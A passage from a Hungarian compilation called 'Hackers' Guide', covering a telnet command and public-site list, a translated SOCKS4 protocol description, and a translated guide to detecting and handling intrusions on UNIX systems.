MODE - megprobál line-to-line vagy character-a-time modba lépni<br />

OPEN - egy oldalhoz csatlakozik<br />

QUIT - kilépés a telnetből<br />

SEND - különleges karaktereket közöl<br />

SET - beállitja a kölönleges paramétereket<br />

STATUS - kiadja az alapinformáciokat<br />

Z - félbeszakitja a telnetet<br />

? vagy HELP - kiirja a telnet súgót.<br />

TELNET HELYEK<br />

sunserv.sztaki.hu<br />

gopher.iif.hu (login:gopher,password:gopher)<br />

132


hollis.harvard.edu<br />

spacelink.msfc.nasa.gov<br />

metro.jussieu.fr10000<br />

info.cnri.reston.va.us185<br />

access.usask.ca (login:hytelnet)<br />

liberty.uc.wlu.edu70<br />

open.dra.com<br />

info.ccit.arizona.edu<br />

gopher.liberty.uc.win.edu70 (login:hytelnet)<br />

base.carl.org<br />

database.carl.org<br />

india.colorado.edu13<br />

spl.lib.wa.us (login:library) (select:1forVT100)<br />

stinfo.hq.eso.org<br />

sunsite.unc.edu<br />

quake.think.com (login:wais)<br />

info.cnri.reston.va.us185<br />

bruno.cs.colorado.edu<br />

ds.internic.net<br />

mudhoney.micro.umn.edu<br />

netfind.oc.com (login:netfind)<br />

redmont.cis.uab.edu (login:netfind)<br />

debra.dgbt.doc.ca3000<br />

teetot.acusd.edu<br />

cfa204.harvard.edu<br />

vax.mtak.hu<br />

Hackers’ Guide<br />

************************************************************************************************<br />

Socks4 Protokoll<br />

Fordítás, kiegészítéssel, eredeti címe, szerzoje: "SOCKS: A protocol for TCP proxy<br />

across firewalls" /Ying-Da Lee, Principal Member Technical Staff, NEC Systems<br />

Laboratory, CSTC/<br />

Néhány fogalmat tisztázzunk, mielott elolvassuk a protokoll-leírást: a kliens az a<br />

számítógép, amely csatlakozni akar az alkalmazásszerverhez. Pl. ha line-208-<br />

110.dial.matav.net csatlakozni akar irc.elte.hu -hoz, akkor line-208-<br />

110.dial.matav.net a kliens, és az irc.elte.hu az alkalmazásszerver. A SOCKS<br />

szerver pedig az a számítógép, amelyiken a SOCKS szolgáltatás fut, és közvetít a<br />

kliens és az alkalmazásszerver között.<br />

A SOCKS-ot eredetileg David Koblas fejlesztette ki és folyamatosan módosult és<br />

bovült a mai változatig - a 4.-esig. Ez egy protokoll, amely TCP kapcsolatokat<br />

133


Hackers’ Guide<br />

közvetít egy tuzfal-számítógépen, hogy a felhasználók számára átlátszó hozzáférést<br />

biztosítson más gépekhez. A protokoll független a különféle alkalmazások<br />

protokolljaitól, ezért sok különbözo szolgáltatásra használható (és használatos is),<br />

mint pl. telnet, ftp, finger, whois, gopher, www, stb. A hozzáférés biztosítása minden<br />

TCP kapcsolat elején történik; utána a szerver már egyszeruen csak közvetíti az<br />

adatokat a kliens és az alkalmazás-szerver között, minimális feldolgozással. A<br />

SOCKS-nak nem kell tudnia semmit az alkalmazás protokolljáról, ezért könnyen<br />

megvalósítható olyan alkalmazás, amely titkosítást használ az adatforgalom<br />

biztosítására.<br />

Két muvelet definiált: a CONNECT és a BIND.<br />

1) CONNECT<br />

A kliens, amikor csatlakozni akar az alkalmazás-szerverrel, csatlakozik a SOCKS<br />

szerverhez és CONNECT-kérést küld. A kliens a kérésben elküldi a célgép IP-címét<br />

és a portszámát, valamint a felhasználói azonosítóját, a következo formátumban.<br />

+----+----+----+----+----+----+----+----+----+----+....+----+ | VN | CD |<br />

DSTPORT | DSTIP | USERID |NULL| +----+----+----+----+----+--<br />

--+----+----+----+----+....+----+ bájtok száma 1 1 2 4 variable<br />

1<br />

ahol:<br />

VN a SOCKS protokoll verziószáma, és 4-nek kell lennie.<br />

CD a SOCKS parancskód és 1-nek kell lennie a CONNECT-kéréshez.<br />

NULL pedig egy 8 db 0-bitbol álló bájt.<br />

DSTPORT a célgép portja, amelyikre csatlakozni akarunk. 2 bájt, a és b, DSTPORT<br />

= a*256+b.<br />

DSTIP a célgép IP címe.<br />

USERID a felhasználói azonosító.<br />

A SOCKS szerver megnézi, hogy a kérés teljesítheto-e, mégpedig a forrásgép IP<br />

címébol, a célgép IP-címébol és portjából, a felhasználói azonosítóból és abból az<br />

információból, amelyet az IDENT útján nyer (RFC1413). Ha a kérés teljesítheto, a<br />

SOCKS szerver kapcsolatot létesít a megadott porttal a célgépen. Egy<br />

válaszcsomagot küld a kliensnek, amikor a kapcsolat létrejött, vagy ha kérést<br />

elutasította, vagy ha a kapcsolat nem hozható létre. Ez a válaszcsomag így néz ki:<br />

+----+----+----+----+----+----+----+----+ | VN | CD | DSTPORT |<br />

DSTIP | +----+----+----+----+----+----+----+----+ bájtok száma: 1 1<br />

2 4<br />

ahol:<br />

VN a válaszkód verziószáma és 0-nak kell lennie.<br />

CD az eredmény kódja, és valamelyiknek kell lennie a következok közül:<br />

134<br />

90: a kérés elfogadva (request granted)<br />

91: a kérés elutasítva vagy nem sikerült (request rejected or failed)<br />

92: a kérés elutasítva, mert a SOCKS szerver nem tudott a kliens identportjára<br />

csatlakozni<br />

93: a kérés elutasítva, mert a kliensprogram és az identd más<br />

felhasználói azonosítót mutatnak


A többi mezot figyelmen kívül kell hagyni.<br />

Hackers’ Guide<br />

A SOCKS szerver azonnal lezárja a kapcsolatot, ha a kapcsolatot nem sikerült<br />

létrehozni, vagy a kérés el lett utasítva. Ha a kérést elfogadta, a SOCKS szerver<br />

felkészül az adatok mindkét irányba történo forgalmazására. Ez lehetové teszi a<br />

kliensnek, hogy írjon/olvasson az adatcsatornán, mintha közvetlenül az<br />

alkalmazásszerverrel lenne összeköttetésben.<br />

2) BIND<br />

Amikor a kliens kapcsolatot akar fogadni az alkalmazásszerverrel, csatlakozik a<br />

SOCKS szerverhez és egy BIND kérést küld. Ez csak akkor történhet, ha elotte már<br />

az alkalmazásszerverrel létrejött egy kapcsolat a CONNECT-kéréssel (elsodleges<br />

kapcsolat). A BIND tulajdonképpen muveletek sorozata:<br />

-bind(): egy socket létrehozása<br />

-getsockname(): a socket IP címének és portszámának megállapítása<br />

-listen(): kész vagyunk az alkalmazásszerver által kezdeményezett kapcsolat<br />

fogadására<br />

-az elsodleges kapcsolaton informáljuk az alkalmazásszervert, hogy milyen IP-címen<br />

és portszámon kell kapcsolódnia<br />

-accept(): elfogadjuk az alkalmazásszerver által kezdeményezett kapcsolatot.<br />

A SOCKS BIND célja, hogy egy ilyen muveletsort végrehajtson, de a SOCKS<br />

szerveren hozzuk létre a socketet, és nem a kliensen.<br />

A kliens a kérésben az alkalmazásszerver IP-címét, az elsodleges kapcsolat<br />

portszámát és a felhasználói azonosítóját küldi el.<br />

+----+----+----+----+----+----+----+----+----+----+....+----+ | VN | CD |<br />

DSTPORT | DSTIP | USERID |NULL| +----+----+----+----+----+--<br />

--+----+----+----+----+....+----+ bájtok száma: 1 1 2 4 variable<br />

1<br />

ahol:<br />

VN a SOCKS protokoll verziószáma, és 4.<br />

CD jelzi, hogy BIND kérésrol van szó, és 2-nek kell lennie.<br />

A SOCKS szerver a klienstol érkezo információkat használja arra, hogy eldöntse,<br />

teljesítheto-e a kérés. Egy válaszcsomagot küld vissza a kliensnek, ugyanolyan<br />

formában, mint a CONNECT-kérésnél:<br />

+----+----+----+----+----+----+----+----+ | VN | CD | DSTPORT |<br />

DSTIP |<br />

2 4<br />

ahol:<br />

+----+----+----+----+----+----+----+----+ bájtok száma: 1 1<br />

VN a válaszkód verziószáma és 0-nak kell lennie.<br />

CD az eredmény kódja és valamelyiknek az alábbiak közül kell lennie:<br />

90: a kérés elfogadva (request granted)<br />

91: a kérés elutasítva vagy nem sikerült (request rejected or failed)<br />

92: a kérés elutasítva, mert a SOCKS szerver nem tudott a kliens identportjára<br />

csatlakozni<br />

135


Hackers’ Guide<br />

93: a kérés elutasítva, mert a kliensprogram és az identd más<br />

felhasználói azonosítót mutatnak<br />

Az elfogadott kérés esetében a DSTPORT és DSTIP mezoknek jelentésük van, nem<br />

úgy, mint a CONNECT esetében, ahol figyelmen kívül hagytuk. Itt a SOCKS szerver<br />

létrehoz egy socketet, hogy fogadni tudja a kapcsolatot az alkalmazásszervertol, és<br />

az IP-címet és portszámot visszaküldi a kliensnek (a DSTIP és DSTPORT<br />

mezokben). Ha a DSTIP mezo a válaszban 0 (az INADDR_ANY konstans értéke),<br />

akkor a kliensnek ki kell ezt cserélnie a SOCKS szerver IP-jével, amelyikhez a kliens<br />

csatlakozik. Általános esetben ez a két szám a kliens rendelkezésére áll a<br />

getsockname() hívás eredményeként. Az alkalmazásprotokollnak biztosítania kell<br />

egy módot arra, hogy ezt a két információt a kliens az alkalmazásszerverhez<br />

eljuttassa, ezáltal az létrehozhassa a kapcsolatot, és ahelyett hogy a klienshez<br />

csatlakozna, a SOCKS szerver megnyitott socket-jéhez csatlakozzon.<br />

A SOCKS szerver egy második válaszcsomagot küld a kliensnek, amikor a kapcsolat<br />

az alkalmazásszerverrel létrejött. A SOCKS szerver ellenorzi a kapcsolat<br />

kezdeményezojének IP-címét, hogy azonos-e a kliens által a BIND-kérésben<br />

megadott DSTIP mezovel. Ha nem egyeznek, a második válaszcsomag CD mezoje<br />

91 lesz és a SOCKS szerver mindkét kapcsolatot bontja (tehát a kliens másodlagos<br />

kapcsolatát és az alkalmazásszerver frissen létrehozott kapcsolatát). Ha<br />

megegyeznek, a második válaszcsomag CD mezoje 90 lesz és a SOCKS szerver<br />

felkészül az adatforgalmazás közvetítésére a két kapcsolat között. A kliens innentol<br />

kezdve ugyanúgy használhatja a socketet, mintha közvetlenül az<br />

alkalmazásszerverhez csatlakozna.<br />

A CONNECT és BIND muveleteknek egyaránt idokorlát van meghatározva (2 perc a<br />

jelenlegi CSTC implementációban) a SOCKS szerver és az alkalmazásszerver<br />

közötti kapcsolatok létrehozására. Ha a kapcsolat az idokorláton belül nem jön létre,<br />

a SOCKS szerver lezárja a kapcsolatot a kliens felé és feladja a dolgot.<br />

Idáig tartott a protokoll leírása, most pedig lássunk egy egyszerusített példát. Tegyük<br />

fel, hogy a kliens IP-címe 10.0.0.1, a SOCKS szerveré 10.0.0.2, és az<br />

alkalmazásszerveré 10.0.0.3. A kliens csatlakozni akar az alkalmazásszerver 6667es<br />

portjára, a SOCKS szerveren keresztül. A következoket kell tennie:<br />

Csatlakozik a 10.0.0.2 SOCKS szerver 1080-as portjára (általában ez a szabvány<br />

SOCKS port), és elküldi az alábbi válaszcsomagot:<br />

4 1 26 11 10 0 0 3 65 0<br />

A fent leírt CONNECT-kérésnél ellenorizzük, melyik szám mit jelent; a 65 az ASCII A<br />

karakter (felhasználói azonosító); a végén pedig ott a NULL.<br />

A szerver ekkor ellenorzi, hogy teljesítheto-e a kérés, esetünkben úgy dönt, hogy<br />

teljesítheto, és kapcsolatot létesít a 10.0.0.3 gép 6667-es portjával. Ha sikerült<br />

létrehozni a kapcsolatot, válaszcsomagot küld a kliensnek:<br />

0 90 4 10 10 0 0 3<br />

Ezután felkészül a közvetítésre. Ha úgy dönt, hogy a kapcsolatot nem teljesíti, vagy<br />

nem hozható létre a kapcsolat az alkalmazásszerverrel, akkor a válaszcsomag<br />

elküldése után egybol bontja a kapcsolatot a klienssel.<br />

136


Hackers’ Guide<br />

************************************************************************************************<br />

Betörések felfedezése és kezelése I.<br />

Eredeti mû : Practical UNIX & Internet Security<br />

Ez a rövidke kis írás azt próbálja leírni majd,hogy milyen lépéseket kell tennünk,ha<br />

betörést észleltünk a rendszerünkbe:hogyan fogjuk el a betolakodót;hogyan derítsük<br />

ki,hogy milyen károkat okozott;hogyan állítsuk helyre a keletkezõ károkat,ha<br />

szükséges.Reméljük,soha nem kell használnod az itt leírt technikákat.<br />

Bevezetés<br />

Három fõ szabály van arra,hogy hogyan kezeljük a betöréseket.<br />

Szabály#1 NE ESS PÁNIKBA!<br />

Egy betörés után,számos különbözõ válaszút elõtt állsz.Ne idegeskedj amiatt,ami<br />

történt,mert így gondolkodás nélkül olyan dolgokat tehetsz,amelyekkel csak rontassz<br />

a helyzeten.<br />

Mielõtt bármit is csinálnál,meg kell kérdezned magadtól néhány kérdést,és a<br />

válaszokat fejben tartani.<br />

- Valóban betörés történt? Az a valami,ami esetleg a betolakodó jelenlétére utal,lehet<br />

az eredménye egy software,vagy emberi hibának is.<br />

- Valóban történt bárminemû károkozás? Számos sikeres betörésnél a betolakodó<br />

ugyan megszerzi a jogosulatlan elérést,de nem nyúl személyes információkhoz,és<br />

nem változtatja meg file-ok tartalmát.<br />

- Fontos,hogy elérjük,és biztonságba helyezzük a bizonyítékot,amit felhasználunk a<br />

késõbbi nyomozás során?<br />

- Fontos,hogy a rendszert minél hamarabb visszaállítsuk normál állapotába?<br />

- Ki kell derítened,hogy lettek -e file-ok megváltoztatva,vagy törölve? Ha igen,hogyan<br />

fogod biztosan megtudni,hogy valóban így történt-e?<br />

- Számít,hogy a cég,vagy a rendszer tulaja tud errõl az incidensrõl? És ha egy külsõ<br />

személy hall róla?<br />

- Megtörténhet újból?<br />

137


Hackers’ Guide<br />

A kérdésekre adoot válaszok egymásnak ellentmondóak is lehetnek,pl : a bizonyíték<br />

védelme és a file-ok összehasonlítása a backuppal nem lehetséges,ha a cél a<br />

rendszer minél elõbbi üzembehelyezése.Neked kell majd eldöntened,mi a legjobb a<br />

site-odnak.<br />

Szabály#2 Dokumentálj!<br />

Indíts egy logot,azonnal.Fogj egy notebookot,és írj le mindent,amit találsz,és mindig<br />

jegyezd le a dátumot,és idõt is.Ha text file-okat vizsgálsz,nyomtass másolatokat,és<br />

dátumozd-szignózd.Ha megvan a szükséges disk space,oda is írd ki az egészet a<br />

script paranccsal.Ezeket az infokat kézben tartva a késõbbi tanulás jelentõs idõt,és<br />

bosszankodást takaríthatunk meg,különösen,ha ha gyorsan vissza kell állítanod,vagy<br />

meg kell változtatnod file-okat,hogy visszaállítsd a rendszert. A következõ<br />

szekciókban megpróbáljuk leírni a mechanizmust,amit arra tudsz használni,hogy<br />

észrevedd a betolakodót,és kezelni tudd a kérdést : mit csináljak,ha<br />

felfedeztem,hogy betolakodó van a rendszeremen.<br />

Szabály#3 Tervezz elõre!<br />

Amikor egy biztonsági probléma adódik,van néhány standard lépés,amiket meg kell<br />

tennünk.Ezeket a lépéseket tervezd el elõre,jegyezd le egy papírra,mert betörés<br />

esetén nagy a hezitálás és a zûrzavar.Ilyenkor nehéz tiszta fejjel gondolkodni. :)<br />

Nagyobb installációknál lehet,hogy szeretnéd gyakorolni ezeket a lépéseket.A<br />

következõ alaplépések ott lehetnek a tervedben :<br />

Step 1: Azonosítsd és értsd meg a problémát.<br />

Ha nem tudod,mi is a probléma pontosan,nem tudsz lépéseket tenni a<br />

kiküszöböléshez.Ez nem azt jelenti,hogy tökéletesen kell,hogy megértsd,de legalább<br />

a körvonalait lásd a problémának,amivel szembenézel.A hálózati kábel elvágása<br />

nem segít rajtad,ha egy bosszúszomjas alkalmazott az irodájából okozta a bajt.<br />

Step 2: Tárold vagy állítsd le a károkozást.<br />

Ha azonosítottad a fennálló problémát,tegyél azonnali lépéseket a megállítás vagy a<br />

korlátozás felé.Abban az esetbet,ha azonosítottad az alkalmazottat,aki system fileokat<br />

töröl,biztosan szeretnéd kilõni az acc.-ját,és talán fegyelmi eljárást indítani<br />

ellene.Ezek olyan lépések,amelyekkel korlátozni lehet a károkozást a<br />

rendszerben,illetve adataiban.<br />

Step 3: Bizonyítsd a diagnózist és határozd meg a kárt.<br />

Ha sikerült az okozott kárt letárolnod valamilyen formában,bizonyítsd a diagnózist,és<br />

határozd meg,milyen kár keletkezett.Tüntek el file-ok,miután az alkalmazottat kilõttük<br />

a rendszerbõl? Soha sem lehetsz 100%-ig biztos benne,hogy 2 vagy több incidens<br />

összefügg.Ezenkívül nem azonosíthatod az összes okozott kárt minden esetben.<br />

Step 4: Állítsd vissza a rendszeredet.<br />

Miután megtudtad,milyen méretû kár keletkezett,vissza kell állítanod a rendszert<br />

normál állapotba.Ez keverhetõ a rendszer egyes részeinek újraindításával a<br />

backupból,vagy jelenthet egy egyszerû system restartot.Mielõtt bármit is<br />

tennél,bizonyosodj meg róla,hogy azok a programok,amiket<br />

138


használsz,"biztonságosak". A támadó felcserélhette a restore programot egy<br />

trojannal,ami letörli az összes file-t a HD-n,és a backup szalagon.<br />

Step 5: Barátkozz meg a helyzettel.<br />

Hackers’ Guide<br />

Ha ilyen jellegû probléma adódik,talán szeretnél néhány változtatást és javítást<br />

eszközölni a rendszeren,miután az visszaállt normál állapotába.Ha egy olyan<br />

személy a bûnös,aki csak valamilyen hibát követett el,és így sebezte meg a<br />

rendszert,talán késõbb szeretnél oktatást adni neki,hogy másodszor elkerüld ezt a<br />

balesetet.Ha valaki szándékosan okozta a kárt,törvényes eljárást kell indítani ellene.<br />

Step 6: Hajtsd végre a szükséges módosításokat,hogy a rendszer biztonságban<br />

legyen.<br />

Ez nagyon fontos lépés,mivel ha nem hárítjuk el a sechole-t,a probléma a<br />

közeljövõben könnyen elõfordulhat mégegyszer.De vigyázzunk,minden módosítást<br />

nagy körültekintéssel végezzünk,nehogy nagyobb kárt okozzunk,mint amit maga a<br />

betörés okozott.<br />

Fordította : Th3NmY<br />

************************************************************************************************<br />

Betörések felfedezése és kezelése II.<br />

A betörõ felfedezése<br />

Számos módszer létezik arra,hogy hogyan fedezhetsz fel egy betolakodót :<br />

-A támadó rajtakapása munka közben.Pl : szeretnéd megnézni,hogy a superuser egy<br />

dial-up terminálról van-e belépve,miközben te vagy az egyetlen személy,aki tudja a<br />

superuser passwordot.<br />

-Következtetés,hogy egy támadó bent van abból,hogy változtatásokat eszközölt a<br />

rendszeren.Pl : kapsz egy e-mailt egy támadótól,aki értesít a sechole-ról,vagy új<br />

account-bejegyzéseket találsz a /etc/passwd-ben. (Unix)<br />

-Üzenetet kapsz egy system administrator-tól,aki egy másik site-ról furcsa<br />

tevékenységet jelez a saját site-járól,amelynek eredete egy olyan account,ami a te<br />

rendszereden van.<br />

-Furcsa aktivítás a rendszeren,úgymint rendszerösszeomlások,nagy hard disk<br />

tevékenység,megmagyarázhatatlan reboot-ok,jelentéktelen accounting<br />

ellentmondások,[1] vagy indokolatlanul lassú system response-ok(Egy Crack futhat a<br />

rendszeren).<br />

139


Hackers’ Guide<br />

[1] Nézd meg Cliff Stoll - The Cuckoo's Egg írását,amely egy olyan történet,amiben a<br />

szerzõ leírja, milyen ellentmondások vezették egy hacker aktivításának<br />

leleplezéséhez.<br />

Számos parancs létezik,amiket arra használhatsz,hogy felfedezz egy betörést,és<br />

néhány kitûnõ package(úgymint Tiger és a Tripwire) is hasonló célt<br />

szolgál.Alkalmazd ezeket gyakran,de ne szabályos idõközönként,hanem<br />

elszórtan.Ez csökkenti a támadók esélyeit a sikeres betöréshez.<br />

Aktivítás közben elfogni a betolakodót<br />

A legkönnyebb út ahhoz,hogy elfogjunk egy támadót,hogy olyan eseményeket<br />

keresünk,amelyek nem megszokottak a rendszeren. Pl:<br />

- Egy user több ízben is loginol.(Sok window system regisztrál egy külön login-t<br />

minden window-hoz,amelyet a user nyit meg,de álltalában szokatlan,hogy ugyanaz a<br />

user be van loginolva 2 különbözõ dial-in vonalról is ugyanabban az idõben)<br />

- Egy user,aki nem programozó,de ennek ellenére egy compilert vagy debuggert<br />

futtat<br />

- Egy user,aki nagyon keményen,és nem jellemzõen használja a networkot.<br />

- Egy user,aki sok dialout hívást indít.<br />

- Egy user,akinek nincs modemje,a computerbe dial-in line-ról van loginolva.<br />

- Egy személy,aki superuserként hajt végre parancsokat.<br />

- Hálózati kapcsolatok elõzõleg ismeretlen gépekrõl,vagy site-okról,amelyek soha<br />

nem kapcsolódtak a rendszeredhez.<br />

- Egy user,aki login-olva van,miközben vakációzik,vagy munkaidõn kívül van(pl : egy<br />

titkárnõ 1:00a.m. -kor dialin - ezett,stb...)<br />

A UNIX rendelkezésünkre bocsát egy rakás olyan parancsot,amelyek segíthetnek<br />

kitalálni,ki mit csinál a rendszeren.A finger, users, whodo, w és who parancsok egy<br />

listát adnak a userekrõl,akik jelenleg loginolva vannak.A ps parancs segít<br />

megállapítani,hogy melyik user mit csinál egy adott idõben.A netstat parancs arra<br />

használható,hogy leellenõrizzük a hálózati aktivítást.<br />

Ha te egy system administrator vagy,már biztosan nagy gyakorlatod van ezeknek a<br />

parancsoknak a kiadásában a felhasználói aktivítás ellenõrzésére. Egy idõ után már<br />

tudni fogod ,hogy az egyes userek milyen parancsokat szoktak kiadni,így ha valami<br />

furcsa dolog történik,közelebbrõl is megnézheted a dolgot.<br />

Légy óvatos,mert ezeket a parancsokat meg tudják "bolondítani" azok a<br />

betolakodók,akiknek sok tapasztalatuk van.Pl a w,users and finger a /etc/utmp file-t<br />

ellenõrzik,hogy ki van jelenleg bejelentkezve.Ha egy támadó töröl,vagy megváltoztat<br />

a saját bejegyzését,vagy az egész file-t megváltoztatja,ezek a parancsok nem fogják<br />

a támadó jelenlétét jelezni.Ráadásul néhány rendszer nem update-eli ezt a file-t,és<br />

néhány window system nem jól update-eli új bejegyzésekkel,szóval nem biztos,hogy<br />

ezek a parancsok minden esetben hiteles információt adnak vissza.<br />

140


Hackers’ Guide<br />

A ps parancs megvizsgálja a kernel process-tábláját,egyszóval ez sokkal ellenálóbb<br />

az esetleges nem kívánt beavatkozások ellen,mint a /etc/utmp file<br />

vizsgálata.Ugyanakkor egy betolakodó akinek már megvan a superuser elérése a<br />

rendszereden,módosíthatja a ps parancsot,vagy a code-ot a rendszer<br />

hívásokban,amiket használ,így az nem fogja kiírni az álltala futtatott<br />

processeket.Egyébként bármely process tudja módosítani az argv argumentumait,<br />

megengedve ezzel,hogy azt jelezze ki,amit akar a ps parancs kimenetében.Ha nem<br />

hiszed el,amit ezek a parancsok kiírnak,a jó úton haladsz. :)<br />

Mit kell tennem,ha valakit elkaptam?<br />

Van egy jó pár választási lehetõségünk,hogy mit teszünk a betolakodóval,akit<br />

lekapcsoltunk :<br />

1. Nem törõdünk vele.<br />

2. Megpróbálunk kapcsolatba lépni vele a write vagy a talk paranccsal,és<br />

megkérdezni,mit akar.<br />

3. Megpróbáljuk nyomkövetni(trace-elni) a connection-t,és azonosítani a támadót<br />

4. Megszakítjuk a connection-t azzal,hogy az álltaluk indított processeket lelõjük;<br />

kihúzzuk a modemet,vagy a hálózati csatlakozót,vagy kikapcsoljuk a computert.<br />

5. Kapcsolatba lépünk a FIRST(Forum of Incident Response and Security Teams)<br />

team-mal(e.g., the CERT-CC),és jelezzük nekik,hogy támadás ért.<br />

Az,hogy mit csinálsz,a te döntésed.Egy támadót figyelmen kívül hagyni a<br />

rendszereden nem egy jó megoldás,mert szabad utat kap,hogy molesztálja a<br />

systemedet,a userokat,stb... :)<br />

Ha a 2. pontot választod,tehát megpróbálsz kapcsolatba lépni vele,mindent logolj<br />

,amit a támadó küld vissza neked,majd döntsd el,melyik ponttal folytatod....<br />

Megjegyzés: Néhány intruder lehet gonosz gondolkodású,vagy pedig nagyon<br />

ilyedékeny,amikor rájön,hogy leleplezték.Ha kapcsolatba lépsz velük,lehet,hogy úgy<br />

reagálnak,hogy elkezdenek mindent letörölni a disken,hogy eltüntessenek minden<br />

nyomot.Ha egy ilyen behatolóval próbálsz kapcsolatba lépni,elõtte legyél biztos<br />

benne,hogy az egész rendszerrõl van backupod.<br />

Ha a behatoló be van lépve a pc-nkbe a hálózaton keresztül,talán szeretnéd<br />

mindenek elõtt a kapcsolatot nyomon követni(trace),mert sokkal könnyebb egy aktív<br />

kapcsolatot nyomkövetni,mint egy inaktívat. :)<br />

A nyomkövetés után talán szeretnél kommunikálni a támadóval a write vagy a talk<br />

parancsokat használva.Ha a behatoló a computeredhez egy fizikai terminálról van<br />

kapcsolódva,biztosan szeretnél a terminálhoz menni(fizikailag),és szembesülni<br />

illetõvel.<br />

Megjegyzés: Kerüld a mail vagy a talk parancs használatát,amivel a távoli site-tal<br />

lépünk kapcsolatba,(ha megpróbálod nyomkövetni a kapcsolatot,és megvan a<br />

remote host),mert lehet,hogy a remote site accountja is hackelve van.Próbáld a<br />

telefont használni ha lehetséges,mielõtt mailt küldessz.Ha mindenképpen egy<br />

üzenetet kell küldened,küldj valami ártatlan dolgot, pl : "Fel tudnál hívni? Problémáink<br />

vannak a mailer-eddel.". Természetesen,ha valaki hív téged,ellenõrizd,ki az.<br />

141


Hackers’ Guide<br />

A behatoló monitorozása<br />

Nyilván szeretnéd monitorozni a támadó aktivítását,hogy kitaláld,mit is csinál<br />

éppen.Kíderítheted,hogy éppen az account database-edet módosítja-e,vagy éppen a<br />

user-eid mailjei körül kotorászik...<br />

Sok dolgot érthetünk a behatoló monitorozása alatt.A legegyszerûbb ,hogy olyan<br />

programokat használunk,mint a ps vagy a lastcomm,hogy megnézzük,mely<br />

processeket használja az intruder.<br />

Az OS-ed típusától függ,hogy tudsz-e olyan programokat használni,mint a ttywatch<br />

vagy a snoop,amikkel az intruder billentyû-leütéseit figyelhetjük. Ezek a parancsok<br />

részletes információt adnak minden packetrõl,amelyet a hálózatra küldõdik. Ezekkel<br />

a részletes infokkal talán könnyebben kideríthetõ,mit is csinál a betolakodó.<br />

Pl:<br />

# snoop<br />

asy8.vineyard.net -> next SMTP C port=1974<br />

asy8.vineyard.net -> next SMTP C port=1974 MAIL FROM: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974<br />

asy8.vineyard.net -> next SMTP C port=1974 RCPT TO: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974<br />

asy8.vineyard.net -> next SMTP C port=1974 DATA\r\n<br />

next -> asy8.vineyard.net SMTP R port=1974 354 Enter mail, end<br />

Ebben a példában egy email-t fogtunk el,amelyet az asy8.vineyard.net-rõl küldtek a<br />

next nevû géphez.Ahogy a fenti példa mutatja,ezek a parancsok részletesen<br />

megmutatják,hogy milyen személyek mit csinálnak a rendszeren.<br />

Legyél óvatos ezekkel az eszközökkel,mert ezeket ellened is felhasználhatja a<br />

támadó,hogy monitorozza a te monitorozásodat.Egyébként megfontolandó ezeknek<br />

az eszközöknek a használata másik gépen(mármint nem a kompromittált<br />

géprõl),mivel így csökkenthetõ az esélye annak,hogy a behatoló felfedezi,hogy<br />

nyomozunk utána.<br />

Egy kapcsolat nyomkövetése<br />

A ps,w,és who parancsok az összes terminálról reportot kérnek,amelyekhez user van<br />

csatolva.Az olyan terminál nevek,mint /dev/tty01 rövidíthetõk simán tty01-re,vagy 01re.Fõként<br />

az olyan nevek,mint tty01,ttya vagy tty4a reprezentálnak soros fizikai<br />

vonalakat,miközben az olyan nevek,amelyek p,q vagy r betût tartalmaznak(mint pl :<br />

ttyp1),hálózati kapcsolatra utalnak(virtuális tty-ok,vagy más néven pszeudoterminálok,vagy<br />

pty-ok)<br />

Ha a támadó telefonvonalon keresztül csatlakozott a rendszerhez,nincs<br />

szerencséd.A telefonhívásokat csak a telefontársaság tudja nyomkövetni,és sajnos<br />

erre nem könnyû rávenni õket. Viszont sok telefontársaságnak vannak spéci<br />

sajátosságaik,úgymint CALL*TRACE és CALLER*ID(CNID),amelyeket<br />

használhatóak ugyanûgy modemhívásoknál,mint voice hívásoknál.Ha már<br />

beállítottad a service-t,és installáltad a megfelelõ hardware-t,már csak aktiválnod<br />

142


kell.<br />

Akkor elolvashatod az eredményeket...<br />

Hackers’ Guide<br />

Ha a támadó hálózaton keresztül van loginelve,használhatod a who commandot<br />

hogy gyorsan kiderítsd a computer nevét,amelyrõl a személy a kapcsolatot<br />

kezdeményezte.Egyszerûen írd be who :<br />

% who<br />

orpheus console Jul 16 16:01<br />

root tty01 Jul 15 20:32<br />

jason ttyp1 Jul 16 18:43 (robot.ocp.com)<br />

devon ttyp2 Jul 16 04:33 (next.cambridge.m)<br />

%<br />

Ebben a példában az orpheus user van loginelve a konzolról,a root tty01-en (Egy<br />

terminál,amely soros vonalon csatlakozik),jason és devon mindketten a hálózaton<br />

keresztül vannak beléptetve.<br />

A who parancs néhány verziója csak az elsõ 16 karakterét írja ki annak a<br />

hostnak,amelyrõl a kapcsolat származtatható(a gépnév egy 16 byte-os mezõben van<br />

a /etc/utmp-ben;a UNIX újabb verziói már több karaktert tudnak tárolni).Ahhoz,hogy a<br />

komplett hostname-et megtudd,a netstat parancsot kell használnod.Ha a behatoló<br />

törölte,vagy módosította a /etc/utmp filet,szintén ezt a parancsot kell használnunk a<br />

támadó eredetének kiderítésére.Sajnos a netstat parancs nem adja vissza,hogy<br />

melyik user melyik network connectionnal hozható kapcsolatba. (Természetesen ha<br />

az elsõ 16 karakterét kiderítettük a hostname-nek,könnyen kitalálhatod,melyik<br />

melyik,még akkor is,ha a /etc/utmp törölve lett.Arra is használhatód a netstat<br />

parancsot,hogy olyan kapcsolatokat keress,amelyek ismeretlen gépektõl<br />

származnak.) Szerencsére a UNIX modernebb verziói,beleértve az SVR4-et,már az<br />

egész hostnevet tárolják.<br />

Tegyük fel,hogy az elõbbi példában Jason egy intruder,mert tudjuk róla,hogy éppen<br />

jógagyakorlatokat végez Tibetben (Ahol nincsenek terminálok :).A who és netstat<br />

parancsokat használva kideríthetjük,hogy az a személy,aki Jason acc.-jával loginolt<br />

,a kapcsolatot a robot.ocp.com-ról indította.Most használjuk a finger parancsot,hogy<br />

kiderítsük,milyen userek vannak a távoli hoston loginelve:<br />

% finger @robot.ocp.com<br />

[robot.ocp.com]<br />

Login Name TTY Idle When<br />

olivia Dr. Olivia Layson co 12d Sun 11:59<br />

wonder Wonder Hacker p1 Sun 14:33<br />

%<br />

Természetesen ez a metódus nem feltétlenül leplezi le a támadót,mert lehet,hogy<br />

csak "átjáróként" (relay point) használja a gépet.A felsõ példában Wonder Hacker<br />

ttyp1-be van loginolva,amelyik egy másik virtuális terminál.Õ talán egy másik géprõl<br />

jött,és egyszerûen a robot.ocp.com-ot használja relay point-ként.<br />

143


Hackers’ Guide<br />

